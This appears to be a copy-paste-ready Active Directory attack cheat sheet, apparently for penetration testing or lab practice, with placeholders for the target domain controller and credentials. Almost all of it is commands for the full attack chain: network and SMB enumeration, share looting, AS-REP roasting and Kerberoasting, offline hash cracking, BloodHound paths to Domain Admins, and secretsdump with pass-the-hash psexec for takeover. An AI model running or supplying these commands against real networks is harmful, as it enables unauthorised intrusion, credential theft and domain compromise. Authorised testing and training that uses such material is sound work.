A living reference for the AD enumeration loop. Copy-paste ready; swap <DC_IP>, <DOMAIN>, and creds.
Host discovery & fingerprint#
nmap -p- --min-rate 2000 -oA nmap/all <DC_IP>
nmap -p 53,88,135,139,389,445,464,636,3268 -sCV -oA nmap/svc <DC_IP>
nxc smb <DC_IP> # hostname + domain + OSSMB#
nxc smb <DC_IP> -u '' -p '' --shares # null session
nxc smb <DC_IP> -u USER -p PASS --shares
nxc smb <DC_IP> -u USER -p PASS --users
nxc smb <DC_IP> -u USER -p PASS -M spider_plus # loot readable sharesLDAP#
ldapsearch -x -H ldap://<DC_IP> -b "DC=domain,DC=local" -s base
nxc ldap <DC_IP> -u USER -p PASS --asreproast asrep.hash
nxc ldap <DC_IP> -u USER -p PASS --kerberoasting kerb.hashKerberos#
# AS-REP roast (no creds needed if you have a userlist)
impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -no-pass
# Kerberoast (creds needed)
impacket-GetUserSPNs <DOMAIN>/USER:PASS -dc-ip <DC_IP> -request
# Crack
hashcat -m 18200 asrep.hash rockyou.txt # AS-REP
hashcat -m 13100 kerb.hash rockyou.txt # TGS / KerberoastBloodHound#
bloodhound-python -u USER -p PASS -d <DOMAIN> -ns <DC_IP> -c All --zipThen in the UI: mark owned → Shortest Path to Domain Admins → DCSync Rights.
Post-compromise#
impacket-secretsdump <DOMAIN>/USER:PASS@<DC_IP> # creds/PtH
impacket-psexec -hashes :NTLM <DOMAIN>/administrator@<DC_IP>Sync your clock before any Kerberos op:
sudo ntpdate <DC_IP>. Skew > 5 min =KRB_AP_ERR_SKEW.